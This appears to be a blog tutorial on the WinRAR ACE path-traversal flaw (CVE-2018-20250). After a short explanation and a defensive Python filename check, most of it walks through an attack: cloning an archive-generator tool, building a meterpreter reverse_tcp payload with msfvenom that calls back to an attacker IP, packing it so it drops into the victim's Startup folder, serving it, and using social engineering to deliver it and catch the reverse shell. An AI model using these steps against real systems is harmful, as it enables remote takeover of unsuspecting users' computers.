WinRAR running malicious code from the application

Below we will discuss how WinRAR fixed serious security issues last month. WinRAR is one of the most popular file compression applications in the world, and the vulnerability we describe below can trick a user of the application into extracting malicious files.


The vulnerability, identified last year by research.checkpoint.com, affects every WinRAR release the company has published in the last 19 years.

CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252 and CVE-2018-20253

Version: WinRAR 5.70 Beta 1

This vulnerability is due to the UNACEV2.DLL library included in all versions of WinRAR. WinRAR uses this library (UNACE.DLL) to compress and decompress ACE-format archives.

In WinRAR versions before 5.61, there is a path traversal when parsing the filename field of the ACE format (in UNACEV2.dll). When the filename field is crafted with specific patterns, the destination (extraction) folder is ignored and the filename is treated as an absolute path. This happens because of improper handling of the field when unace.dll is used.
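As an added defensive illustration (not code from the original post or from any WinRAR component), the Python check below shows the validation an extractor must apply to an archive entry's filename field before joining it to the destination folder: drive-letter or UNC prefixes, leading separators and parent-directory components are rejected, and the final target is confirmed to sit under the destination. The entry names are constructed samples, not values taken from a real ACE archive.

```python
import ntpath
import posixpath

# Constructed sample entry names, modelled on what an archive header's
# filename field may contain. They are illustrative, not from a real archive.
SAMPLE_ENTRIES = [
    "docs/readme.txt",                        # benign relative path
    "sub/./winrar.txt",                       # benign once normalised
    "..\\..\\Programs\\Startup\\winrar.exe",  # parent-directory traversal
    "C:\\Users\\Public\\winrar.exe",          # absolute path with drive letter
    "C:../Startup/winrar.exe",                # drive-relative path, no separator
    "\\\\server\\share\\winrar.exe",          # UNC path
]

def normalise(name):
    """Treat '\\' and '/' alike, as Windows extractors do."""
    return name.replace("\\", "/")

def is_unsafe_entry(name):
    """Return why an entry name must not be used as an extraction path, or None."""
    n = normalise(name)
    # ntpath.splitdrive recognises 'C:' as well as '//server/share' prefixes
    drive, _ = ntpath.splitdrive(n)
    if drive:
        return "drive or UNC prefix"
    if n.startswith("/"):
        return "absolute path"
    parts = posixpath.normpath(n).split("/")
    if ".." in parts:
        return "parent-directory traversal"
    return None

def scan_entries(entries):
    """Map each unsafe entry name to the reason it was flagged."""
    return {e: r for e in entries if (r := is_unsafe_entry(e))}

def extraction_target(dest_dir, name):
    """Compute where an entry lands; raise ValueError if it would leave dest_dir."""
    reason = is_unsafe_entry(name)
    if reason:
        raise ValueError(f"rejected {name!r}: {reason}")
    dest = posixpath.normpath(normalise(dest_dir))
    target = posixpath.normpath(posixpath.join(dest, normalise(name)))
    # Second line of defence: the joined path must still sit under dest.
    if posixpath.commonpath([dest, target]) != dest:
        raise ValueError(f"rejected {name!r}: escapes {dest_dir!r}")
    return target
```

A patched extractor applies the same rule: the destination folder chosen by the user is never overridden by whatever the archive's filename field says.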

Let's download a python script that will create a malicious file in rar format. Once you have downloaded the Python script, install the dependencies needed to run it.

git clone //github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen/
pip3 install -r requirements.txt


Additionally, grant full permissions to the python script in the Evil-WinRAR-Gen folder and then create a malicious exe file with msfvenom. Name it "winrar.exe", as shown in the Metasploit command below.

chmod 777 evilWinRAR.py
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe


Now create a text file that will be shown to the victim when the rar file is extracted. Then run the evilWinRAR python script with the malicious exe file and the text file, producing a malicious archive that can be sent to the target.

touch winrar.txt
./evilWinRAR.py -e winrar.exe -g winrar.txt
python -m SimpleHTTPServer 8080

As we said, this vulnerability allows the malicious file to be extracted to an arbitrary path, and with the help of this script the rar file will extract into the Startup programs folder. Now use social engineering to deliver the malicious rar to the victim and wait until the victim reboots their machine to get a reverse connection from the target.

There is currently no program in the victim's Startup folder, as shown below. Once the victim extracts the malicious rar file "evil.rar", the backdoor winrar.exe is extracted into the Startup folder.

To confirm that the winrar.exe file is in the Startup folder, type shell:startup in the Run prompt.


Once the victim restarts the machine, you will receive a reverse connection as shown below.


Author: Aarti Singh


Written by giorgos
